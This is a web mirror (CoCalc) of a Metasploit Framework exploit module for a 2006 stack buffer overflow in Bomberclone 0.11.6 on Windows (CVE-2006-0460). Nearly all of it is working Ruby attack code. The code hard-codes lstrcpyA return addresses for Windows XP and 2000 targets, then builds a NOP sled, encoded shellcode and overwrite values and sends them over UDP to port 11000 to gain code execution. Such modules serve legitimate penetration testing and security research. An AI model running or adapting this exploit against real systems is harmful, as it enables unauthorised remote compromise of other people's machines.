Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/bomberclone_overflow.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Bomberclone 0.11.6 Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.

18
          The return address is overwritten with lstrcpyA memory address,

19
          the second and third value are the destination buffer,

20
          the fourth value is the source address of our buffer in the stack.

21
          This exploit is like a return in libc.

22


23
          ATTENTION

24
          The shellcode is exec ONLY when someone try to close bomberclone.

25
        },

26
        'Author' => 'Jacopo Cervini <acaro[at]jervus.it>',

27
        'References' => [

28
          ['CVE', '2006-0460'],

29
          ['OSVDB', '23263'],

30
          ['BID', '16697']

31
        ],

32
        'Payload' => {

33
          'Space' => 344,

34
          'BadChars' => "\x00"

35
        },

36
        'Platform' => 'win',

37
        'Targets' => [

38
          ['Windows XP SP2 Italian', { 'Ret' => 0x7c80c729, } ], # kernel32!lstrcpyA

39
          ['Windows 2000 SP1 English', { 'Ret' => 0x77e85f08, } ], # kernel32!lstrcpyA

40
          ['Windows 2000 SP1 English', { 'Ret' => 0x77e95e8b, } ], # kernel32!lstrcpyA

41
        ],

42
        'Privileged' => false,

43
        'DisclosureDate' => '2006-02-16',

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options([ Opt::RPORT(11000) ])

53
  end

54


55
  def exploit

56
    connect_udp

57


58
    pattern = make_nops(421)

59
    pattern << payload.encoded

60
    pattern << [ target.ret ].pack('V')

61
    pattern << "\x04\xec\xfd\x7f" * 2

62
    pattern << "\xa4\xfa\x22\x00"

63


64
    request = "\x00\x00\x00\x00\x38\x03\x41" + pattern + "\r\n"

65


66
    print_status("Trying #{target.name} using lstrcpyA address at #{"0x%.8x" % target.ret}...")

67


68
    udp_sock.put(request)

69
    udp_sock.get(5)

70


71
    handler(udp_sock)

72
    disconnect_udp

73
  end

74
end

75


76